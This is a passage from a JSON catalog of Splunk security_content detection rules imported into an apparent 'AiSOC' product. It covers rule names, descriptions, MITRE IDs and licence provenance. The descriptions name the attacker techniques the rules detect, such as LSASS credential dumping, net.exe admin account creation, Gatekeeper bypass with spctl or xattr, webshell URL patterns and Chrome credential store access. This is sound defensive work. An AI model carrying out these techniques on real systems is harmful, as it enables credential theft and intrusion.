"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-developer-signed-msix-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2c0427aa-982c-4e97-bc33-bddeda4fd095", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_developer_signed_msix_package_installation.yml" } }, { "id": "splunk-security-content-2c365e57-4414-4540-8dc0-73ab10729996", "type": "detection", "name": "Detect Credential Dumping through LSASS access", "description": "The following analytic detects attempts to read LSASS memory, indicative of credential dumping. It leverages Sysmon EventCode 10, filtering for specific access permissions (0x1010 and 0x1410) on the lsass.exe process. This activity is significant because it suggests an attacker is trying to extract credentials from LSASS memory, potentially leading to unauthorized access, data breaches, and compromise of sensitive information. If confirmed malicious, this could enable attackers to escalate privileges, move laterally within the network, or exfiltrate data. Extensive triage is necessary to differentiate between malicious and benign activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-credential-dumping-through-lsass-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2c365e57-4414-4540-8dc0-73ab10729996", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_credential_dumping_through_lsass_access.yml" } }, { "id": "splunk-security-content-2c568c34-bb57-4b43-9d75-19c605b98e70", "type": "detection", "name": "Windows Create Local Administrator Account Via Net", "description": "The following analytic detects the creation of a local administrator account using the \"net.exe\" command. It leverages Endpoint Detection and Response (EDR) data to identify processes named \"net.exe\" with the \"/add\" parameter and keywords related to administrator accounts. This activity is significant as it may indicate an attacker attempting to gain persistent access or escalate privileges. If confirmed malicious, this could lead to unauthorized access, data theft, or further system compromise. Review the process details, user context, and related artifacts to determine the legitimacy of the activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-create-local-administrator-account-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2c568c34-bb57-4b43-9d75-19c605b98e70", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_create_local_administrator_account_via_net.yml" } }, { "id": "splunk-security-content-2c853856-a140-11eb-a5b5-acde48001122", "type": "detection", "name": "GPUpdate with no Command Line Arguments with Network", "description": "The following analytic detects the execution of gpupdate.exe without command line arguments and with an active network connection. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process execution and network traffic data. It is significant because gpupdate.exe typically runs with specific arguments, and its execution without them, especially with network activity, is often associated with malicious software like Cobalt Strike. If confirmed malicious, this activity could indicate an attacker leveraging gpupdate.exe for lateral movement, command and control, or other nefarious purposes, potentially leading to system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gpupdate-with-no-command-line-arguments-with-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2c853856-a140-11eb-a5b5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/gpupdate_with_no_command_line_arguments_with_network.yml" } }, { "id": "splunk-security-content-2c9346f3-bbeb-48ce-8411-fc13d09d83a5", "type": "detection", "name": "MacOS Gatekeeper Bypass", "description": "Detects known MacOS security bypass techniques that may be used to enable malicious code execution.\nSpecifically monitors for attempts to remove the com.apple.quarantine attribute using xattr, or to disable Gatekeeper protections via spctl --master-disable, both of which can allow untrusted or malicious applications to execute without standard system safeguards.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1553.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-gatekeeper-bypass.yaml", "provenance": { "source": "splunk/security_content", "source_id": "2c9346f3-bbeb-48ce-8411-fc13d09d83a5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_gatekeeper_bypass.yml" } }, { "id": "splunk-security-content-2c9d4f5a-8b6e-4c7f-9d8e-1a2b3c4d5e6f", "type": "detection", "name": "Cisco Privileged Account Creation with HTTP Command Execution", "description": "This analytic correlates risk events between privileged account creation on Cisco IOS devices and HTTP requests to privileged execution paths such as `/level/15/exec/-/*`.\nAPT actors have been observed creating privileged accounts and then running commands on routers via HTTP GET or POST requests that target privileged execution paths.\nThese requests allow attackers to execute commands with the highest privilege level (15) on Cisco devices without requiring interactive SSH access.\nThis correlation identifies when both \"Cisco IOS Suspicious Privileged Account Creation\" and \"Privileged Command Execution via HTTP\" Snort detections fire for the same network device.\nThis behavior indicates an attacker leveraging the newly created account to execute commands remotely via HTTP.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004", "T1136", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-privileged-account-creation-with-http-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2c9d4f5a-8b6e-4c7f-9d8e-1a2b3c4d5e6f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_privileged_account_creation_with_http_command_execution.yml" } }, { "id": "splunk-security-content-2ca1c4a1-8342-4750-9363-905650e0c933", "type": "detection", "name": "Windows Suspicious Driver Loaded Path", "description": "The following analytic detects the loading of drivers from suspicious paths, which is a technique often used by malicious software such as coin miners (e.g., xmrig). It leverages Sysmon EventCode 6 to identify drivers loaded from non-standard directories. This activity is significant because legitimate drivers typically reside in specific system directories, and deviations may indicate malicious activity. If confirmed malicious, this could allow an attacker to execute code at the kernel level, potentially leading to privilege escalation, persistence, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-driver-loaded-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ca1c4a1-8342-4750-9363-905650e0c933", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_driver_loaded_path.yml" } }, { "id": "splunk-security-content-2ce9f31d-ab4f-4179-b2b7-c77a9652e1d8", "type": "detection", "name": "O365 Compliance Content Search Exported", "description": "The following analytic identifies when the results of a content search within the Office 365 Security and Compliance Center are exported. It uses the SearchExported operation from the SecurityComplianceCenter workload in the o365_management_activity data source. This activity is significant because exporting search results can involve sensitive or critical organizational data, potentially leading to data exfiltration. If confirmed malicious, an attacker could gain access to and exfiltrate sensitive information, posing a severe risk to the organization's data security and compliance posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-compliance-content-search-exported.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ce9f31d-ab4f-4179-b2b7-c77a9652e1d8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_compliance_content_search_exported.yml" } }, { "id": "splunk-security-content-2cf5cc25-f39a-436d-a790-4857e5995ede", "type": "detection", "name": "Network Connection Discovery With Netstat", "description": "The following analytic detects the execution of `netstat.exe` with command-line arguments to list network connections on a system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line executions, and parent processes. This activity is significant as both Red Teams and adversaries use `netstat.exe` for situational awareness and Active Directory discovery. If confirmed malicious, this behavior could allow attackers to map network connections, identify critical systems, and plan further lateral movement or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/network-connection-discovery-with-netstat.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2cf5cc25-f39a-436d-a790-4857e5995ede", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/network_connection_discovery_with_netstat.yml" } }, { "id": "splunk-security-content-2d10095e-05ae-11ec-8fdf-acde48001122", "type": "detection", "name": "Exchange PowerShell Module Usage", "description": "The following analytic detects the usage of specific Exchange PowerShell modules, such as New-MailboxExportRequest, New-ManagementRoleAssignment, New-MailboxSearch, and Get-Recipient. It leverages PowerShell Script Block Logging (EventCode 4104) to identify these commands. This activity is significant because these modules can be exploited by adversaries who have gained access via ProxyShell or ProxyNotShell vulnerabilities. If confirmed malicious, attackers could export mailbox contents, assign management roles, conduct mailbox searches, or view recipient objects, potentially leading to data exfiltration, privilege escalation, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/exchange-powershell-module-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2d10095e-05ae-11ec-8fdf-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/exchange_powershell_module_usage.yml" } }, { "id": "splunk-security-content-2d4470ef-7158-4b47-b68b-1f7f16382156", "type": "detection", "name": "Windows Suspicious Child Process Spawned From WebServer", "description": "The following analytic identifies the execution of suspicious processes typically associated with WebShell activity on web servers. It detects when processes like `cmd.exe`, `powershell.exe`, or `bash.exe` are spawned by web server processes such as `w3wp.exe` or `nginx.exe`. This behavior is significant as it may indicate an adversary exploiting a web application vulnerability to install a WebShell, providing persistent access and command execution capabilities. If confirmed malicious, this activity could allow attackers to maintain control over the compromised server, execute arbitrary commands, and potentially escalate privileges or exfiltrate sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-child-process-spawned-from-webserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2d4470ef-7158-4b47-b68b-1f7f16382156", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_child_process_spawned_from_webserver.yml" } }, { "id": "splunk-security-content-2d4b9e7f-5c3a-4d8e-9b1f-8a6c5e2d4f7a", "type": "detection", "name": "Cisco ASA - User Account Deleted From Local Database", "description": "This analytic detects deletion of user accounts from Cisco ASA devices via CLI or ASDM.\nAdversaries may delete local accounts to cover their tracks, remove evidence of their activities, disrupt incident response efforts, or deny legitimate administrator access during an attack. Account deletion can also indicate an attempt to hide the creation of temporary accounts used during compromise.\nThe detection monitors for ASA message ID 502102, which is generated whenever a local user account is deleted from the device, capturing details including the deleted username, privilege level, and the administrator who performed the deletion.\nInvestigate unexpected account deletions, especially those involving privileged accounts (level 15), deletions performed outside business hours, deletions by non-administrative users, or deletions that coincide with other suspicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531", "T1070.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-user-account-deleted-from-local-database.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2d4b9e7f-5c3a-4d8e-9b1f-8a6c5e2d4f7a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___user_account_deleted_from_local_database.yml" } }, { "id": "splunk-security-content-2d8679ef-b075-46be-8059-c25116cb1072", "type": "detection", "name": "O365 User Consent Denied for OAuth Application", "description": "The following analytic identifies instances where a user has denied consent to an OAuth application seeking permissions within the Office 365 environment. This detection leverages O365 audit logs, focusing on events related to user consent actions. By filtering for denied consent actions associated with OAuth applications, it captures instances where users have actively rejected permission requests. This activity is significant as it may indicate users spotting potentially suspicious or unfamiliar applications. If confirmed malicious, it suggests an attempt by a potentially harmful application to gain unauthorized access, which was proactively blocked by the user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-user-consent-denied-for-oauth-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2d8679ef-b075-46be-8059-c25116cb1072", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_user_consent_denied_for_oauth_application.yml" } }, { "id": "splunk-security-content-2dbeee3a-f067-11eb-96c0-acde48001122", "type": "detection", "name": "Rundll32 Create Remote Thread To A Process", "description": "The following analytic detects the creation of a remote thread by rundll32.exe into another process. It leverages Sysmon EventCode 8 logs, specifically monitoring SourceImage and TargetImage fields. This activity is significant as it is a common technique used by malware, such as IcedID, to execute malicious code within legitimate processes, aiding in defense evasion and data theft. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, escalate privileges, and exfiltrate sensitive information from the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-create-remote-thread-to-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2dbeee3a-f067-11eb-96c0-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_create_remote_thread_to_a_process.yml" } }, { "id": "splunk-security-content-2dd719ac-3021-11ec-97b4-acde48001122", "type": "detection", "name": "Disable Defender BlockAtFirstSeen Feature", "description": "The following analytic detects the modification of the Windows registry to disable the Windows Defender BlockAtFirstSeen feature. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path associated with Windows Defender SpyNet and the DisableBlockAtFirstSeen value. This activity is significant because disabling this feature can allow malicious files to bypass initial detection by Windows Defender, increasing the risk of malware infection. If confirmed malicious, this action could enable attackers to execute malicious code undetected, leading to potential system compromise and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-blockatfirstseen-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2dd719ac-3021-11ec-97b4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_blockatfirstseen_feature.yml" } }, { "id": "splunk-security-content-2de3d5b8-a4fa-45c5-8540-6d071c194d24", "type": "detection", "name": "Detect Port Security Violation", "description": "The following analytic detects port security violations on Cisco switches. It leverages logs from Cisco network devices, specifically looking for events with mnemonics indicating port security violations. This activity is significant because it indicates an unauthorized device attempting to connect to a secured port, potentially bypassing network access controls. If confirmed malicious, this could allow an attacker to gain unauthorized access to the network, leading to data exfiltration, network disruption, or further lateral movement within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1498", "T1557.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-port-security-violation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2de3d5b8-a4fa-45c5-8540-6d071c194d24", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_port_security_violation.yml" } }, { "id": "splunk-security-content-2e155547-aaac-49d3-b0ef-ceabc31fd364", "type": "detection", "name": "ESXi VM Exported via Remote Tool", "description": "This detection identifies the use of a remote tool to download virtual machine disk files from a datastore. The NFC protocol is used by management tools to transfer files to and from ESXi hosts, but it can also be abused by attackers or insiders to exfiltrate full virtual disk images", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-vm-exported-via-remote-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e155547-aaac-49d3-b0ef-ceabc31fd364", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_vm_exported_via_remote_tool.yml" } }, { "id": "splunk-security-content-2e58a4ff-398f-42f4-8fd0-e01ebfe2a8ce", "type": "detection", "name": "Linux Node Privilege Escalation", "description": "The following analytic identifies the execution of Node.js with elevated privileges using sudo, specifically when spawning child processes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include specific Node.js commands. This activity is significant because running Node.js as a superuser without dropping privileges can allow unauthorized access to the file system and potential privilege escalation. If confirmed malicious, this could enable an attacker to maintain privileged access, execute arbitrary code, and compromise sensitive data within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-node-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e58a4ff-398f-42f4-8fd0-e01ebfe2a8ce", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_node_privilege_escalation.yml" } }, { "id": "splunk-security-content-2e65afe0-9a75-4487-bd87-ada9a9f1b9af", "type": "detection", "name": "Windows Credentials from Password Stores Chrome Extension Access", "description": "The following analytic detects non-Chrome processes attempting to access the Chrome extensions file. It leverages Windows Security Event logs, specifically event code 4663, to identify this behavior. This activity is significant because adversaries may exploit this file to extract sensitive information from the Chrome browser, posing a security risk. If confirmed malicious, this could lead to unauthorized access to stored credentials and other sensitive data, potentially compromising the security of the affected system and broader network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-chrome-extension-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e65afe0-9a75-4487-bd87-ada9a9f1b9af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_chrome_extension_access.yml" } }, { "id": "splunk-security-content-2e765c1b-144a-49f0-93d0-1df4287cca04", "type": "detection", "name": "Windows System Discovery Using Qwinsta", "description": "The following analytic detects the execution of \"qwinsta.exe\" on a Windows operating system. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. The \"qwinsta.exe\" tool is significant because it can display detailed session information on a remote desktop session host server. This behavior is noteworthy as it is commonly abused by Qakbot malware to gather system information and send it back to its Command and Control (C2) server. If confirmed malicious, this activity could lead to unauthorized data exfiltration and further compromise of the host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-discovery-using-qwinsta.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e765c1b-144a-49f0-93d0-1df4287cca04", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_discovery_using_qwinsta.yml" } }, { "id": "splunk-security-content-2e768497-04e0-4188-b800-70dd2be0e30d", "type": "detection", "name": "Windows Modify Registry Qakbot Binary Data Registry", "description": "The following analytic detects the creation of a suspicious registry entry by Qakbot malware, characterized by 8 random registry value names with encrypted binary data. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry modifications under the \"SOFTWARE\\\\Microsoft\\\\\" path by processes like explorer.exe. This activity is significant as it indicates potential Qakbot infection, which uses the registry to store malicious code or configuration data. If confirmed malicious, this could allow attackers to maintain persistence and execute arbitrary code on the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-qakbot-binary-data-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e768497-04e0-4188-b800-70dd2be0e30d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_qakbot_binary_data_registry.yml" } }, { "id": "splunk-security-content-2e891cbe-0426-11ec-9c9c-acde48001122", "type": "detection", "name": "GetLocalUser with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-LocalUser` PowerShell commandlet using PowerShell Script Block Logging (EventCode=4104). This commandlet lists all local users on a system. The detection leverages script block text from PowerShell logs to identify this activity. Monitoring this behavior is significant as adversaries and Red Teams may use it to enumerate local users for situational awareness and Active Directory discovery. If confirmed malicious, this activity could lead to further reconnaissance, enabling attackers to identify potential targets for privilege escalation or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getlocaluser-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2e891cbe-0426-11ec-9c9c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getlocaluser_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-2eba3d36-14a6-11ec-a682-acde48001122", "type": "detection", "name": "MS Scripting Process Loading WMI Module", "description": "The following analytic detects the loading of WMI modules by Microsoft scripting processes like wscript.exe or cscript.exe. It leverages Sysmon EventCode 7 to identify instances where these scripting engines load specific WMI-related DLLs. This activity is significant because it can indicate the presence of malware, such as the FIN7 implant, which uses JavaScript to execute WMI queries for gathering host information to send to a C2 server. If confirmed malicious, this behavior could allow attackers to collect sensitive system information and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ms-scripting-process-loading-wmi-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2eba3d36-14a6-11ec-a682-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ms_scripting_process_loading_wmi_module.yml" } }, { "id": "splunk-security-content-2ec08a09-9ff1-4dac-b59f-1efd57972ec1", "type": "detection", "name": "Supernova Webshell", "description": "The following analytic detects the presence of the Supernova webshell, used in the SUNBURST attack, by identifying specific patterns in web URLs. The detection leverages Splunk to search for URLs containing \"*logoimagehandler.ashx*codes*\", \"*logoimagehandler.ashx*clazz*\", \"*logoimagehandler.ashx*method*\", and \"*logoimagehandler.ashx*args*\". This activity is significant as it indicates potential unauthorized access and arbitrary code execution on a compromised system. If confirmed malicious, this could lead to data theft, ransomware deployment, or other severe outcomes. Immediate steps include reviewing the web URLs, inspecting on-disk artifacts, and analyzing concurrent processes and network connections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/supernova-webshell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2ec08a09-9ff1-4dac-b59f-1efd57972ec1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/supernova_webshell.yml" } }, { "id": "splunk-security-content-2ed89ba9-c6c7-46aa-9f08-a2a1c2955aa3", "type": "detection", "name": "Windows SqlWriter SQLDumper DLL Sideload", "description": "The following analytic detects the abuse of SqlWriter and SQLDumper executables to sideload the vcruntime140.dll library. It leverages Sysmon EventCode 7 logs, focusing on instances where SQLDumper.exe or SQLWriter.exe load vcruntime140.dll, excluding legitimate loads from the System32 directory. This activity is significant as it indicates potential DLL sideloading, a technique used by adversaries to execute malicious code within trusted processes. If confirmed malicious, this could allow attackers to execute 